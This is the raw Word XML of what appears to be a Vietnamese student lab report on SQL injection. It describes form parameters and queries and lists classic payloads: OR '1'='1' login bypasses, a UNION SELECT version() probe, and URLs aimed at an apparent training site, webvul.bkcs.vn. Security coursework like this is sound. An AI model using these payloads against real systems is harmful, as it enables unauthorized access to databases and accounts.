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358A7F" w14:textId="209F2744" w:rsidR="00EA6BA2" w:rsidRDefault="00EA6BA2" w:rsidP="00DE1665"/>
    <w:p w14:paraId="18807521" w14:textId="198D9527" w:rsidR="00DE1665" w:rsidRDefault="00DE1665" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00DE1665">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679FB050" wp14:editId="1C159D3B">
            <wp:extent cx="59436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97F6" w14:textId="4E70B071" w:rsidR="00DE1665" w:rsidRDefault="00DE1665" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00DE1665">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542DBAE9" wp14:editId="6082B3CD">
            <wp:extent cx="5943600" cy="31857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9E8F" w14:textId="55BDF9D3" w:rsidR="00DE1665" w:rsidRDefault="00DE1665" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00DE1665">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A358596" wp14:editId="22008FA5">
            <wp:extent cx="5943600" cy="32581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E638" w14:textId="555D6156" w:rsidR="00DE1665" w:rsidRDefault="00DE1665" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00DE1665">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6C0E29" wp14:editId="16283784">
            <wp:extent cx="5943600" cy="30251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91C8" w14:textId="3AC20806" w:rsidR="00DE1665" w:rsidRDefault="00050A74" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00050A74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BA95BD" wp14:editId="3C2437BF">
            <wp:extent cx="5943600" cy="4981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6876" w14:textId="77777777" w:rsidR="00050A74" w:rsidRDefault="00050A74" w:rsidP="00DE1665"/>
    <w:p w14:paraId="1D636683" w14:textId="134F37E1" w:rsidR="00050A74" w:rsidRDefault="00050A74" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00050A74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611F756C" wp14:editId="5901AA81">
            <wp:extent cx="5943600" cy="32626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07EE" w14:textId="5850CD79" w:rsidR="00050A74" w:rsidRDefault="00050A74" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00050A74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE77E2A" wp14:editId="6751FD5C">
            <wp:extent cx="5943600" cy="30638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AD7B" w14:textId="6B4AB21B" w:rsidR="00050A74" w:rsidRDefault="00050A74" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00050A74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B9FA587" wp14:editId="5AE6572B">
            <wp:extent cx="5943600" cy="47859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B01BC" w14:textId="255D5F19" w:rsidR="00050A74" w:rsidRDefault="00050A74" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00050A74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A16030C" wp14:editId="3C85BFDD">
            <wp:extent cx="5943600" cy="51092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650D" w14:textId="1280B566" w:rsidR="00050A74" w:rsidRDefault="0032225F" w:rsidP="00DE1665">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B22D4E" w14:textId="2932ADCF" w:rsidR="0032225F" w:rsidRDefault="006E7FEC" w:rsidP="00DE1665">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Các tham số đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D93C67D" w14:textId="7E41E9A0" w:rsidR="006E7FEC" w:rsidRDefault="00505F63" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00505F63">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41AC9CEE" wp14:editId="560E92AB">
            <wp:extent cx="5943600" cy="1543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50D2" w14:textId="67CBADAA" w:rsidR="006E7FEC" w:rsidRDefault="006E7FEC" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gửi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method post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD23CA3" w14:textId="28D20465" w:rsidR="006E7FEC" w:rsidRDefault="006E7FEC" w:rsidP="00DE1665">
      <w:r w:rsidRPr="006E7FEC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFF5196" wp14:editId="25AA7256">
            <wp:extent cx="5943600" cy="1149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CA72" w14:textId="32FB2EF0" w:rsidR="00505F63" w:rsidRDefault="00505F63" w:rsidP="00DE1665"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>: INSERT INTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69447784" w14:textId="4A9C1D01" w:rsidR="00505F63" w:rsidRDefault="00505F63" w:rsidP="00DE1665"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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02A9E3FD" w14:textId="3A3550F6" w:rsidR="00505F63" w:rsidRDefault="00505F63" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00505F63">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A6FC902" wp14:editId="56F074D2">
            <wp:extent cx="5943600" cy="1543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C3AF" w14:textId="6160CA51" w:rsidR="0032225F" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trừ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> upass2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> signup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insert into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E6B07" w14:textId="11959A70" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dùng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Select …. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WHERE ….</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OR 1 =1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA55AB4" w14:textId="7D7885FE" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335275A8" w14:textId="4B4786C6" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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</w:p>
    <w:p w14:paraId="13B96AEB" w14:textId="2059337E" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00E26B07">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19193727" wp14:editId="7765867E">
            <wp:extent cx="1552792" cy="1247949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79E0" w14:textId="4BB2BE0D" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gửi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method post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9441F2" w14:textId="5661DF1C" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00E26B07">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B91935" wp14:editId="4EC90F33">
            <wp:extent cx="5943600" cy="8489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03F4" w14:textId="27350A91" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kiểu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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF954BE" w14:textId="3246D577" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phán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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trí</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D5BB54B" w14:textId="6C72430C" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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ở </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>câu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select * from users where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> … AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76832129" w14:textId="3A6FFB2A" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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: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trọng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F9C2133" w14:textId="241D55B0" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00E26B07">
        <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '...';</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7C060" w14:textId="078CAA5A" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r w:rsidRPr="00E26B07">
        <w:t>SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702BD30D" w14:textId="2598EEDE" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E26B07">
        <w:t>' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E26B07">
        <w:t xml:space="preserve"> SELECT null, version(), null</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75034422" w14:textId="77777777" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"/>
    <w:p w14:paraId="77108CC4" w14:textId="6B67D15A" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F53E67" w14:textId="1B4F3EE5" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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63DC73B1" w14:textId="476156D7" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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server: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request method get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28F48364" w14:textId="443021BC" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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</w:p>
    <w:p w14:paraId="248A645D" w14:textId="6C39080B" w:rsidR="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"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: cao</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="525EF6D4" w14:textId="77777777" w:rsidR="00E26B07" w:rsidRPr="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00E26B07">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hAnsi="Symbol"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>://webvul.bkcs.vn/index.php?id=1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20300A32" w14:textId="77777777" w:rsidR="00E26B07" w:rsidRPr="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00E26B07">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hAnsi="Symbol"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">://webvul.bkcs.vn/index.php?id=1 UNION SELECT null, version(), null-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03D835" w14:textId="77777777" w:rsidR="00E26B07" w:rsidRPr="00E26B07" w:rsidRDefault="00E26B07" w:rsidP="00E26B07">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hAnsi="Symbol"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E26B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>://webvul.bkcs.vn/index.php?id=-1 OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2572E7B7" w14:textId="77777777" w:rsidR="00E26B07" w:rsidRPr="00DE1665" w:rsidRDefault="00E26B07" w:rsidP="00DE1665"/>
    <w:sectPr w:rsidR="00E26B07" w:rsidRPr="00DE16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246E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D514F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BA2"/>
    <w:rsid w:val="00040C62"/>
    <w:rsid w:val="00050A74"/>
    <w:rsid w:val="00184841"/>
    <w:rsid w:val="0032225F"/>
    <w:rsid w:val="003E0328"/>
    <w:rsid w:val="00435280"/>
    <w:rsid w:val="00505F63"/>
    <w:rsid w:val="00564578"/>
    <w:rsid w:val="006E7FEC"/>
    <w:rsid w:val="007E2DF0"/>
    <w:rsid w:val="00B454DE"/>
    <w:rsid w:val="00CA1626"/>
    <w:rsid w:val="00D307A7"/>
    <w:rsid w:val="00DE1665"/>
    <w:rsid w:val="00E26B07"/>
    <w:rsid w:val="00EA6BA2"/>
    <w:rsid w:val="00FB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C6E5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iCs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C62"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Angsana New"/>
      <w:szCs w:val="3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166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665"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Angsana New"/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="th-TH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E26B0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iCs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C62"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Angsana New"/>
      <w:szCs w:val="3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166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665"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Angsana New"/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="th-TH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E26B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2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8</Pages>
  <Words>139</Words>
  <Characters>793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hotuankhanh20112016@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DELL</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-06T17:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-16T01:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>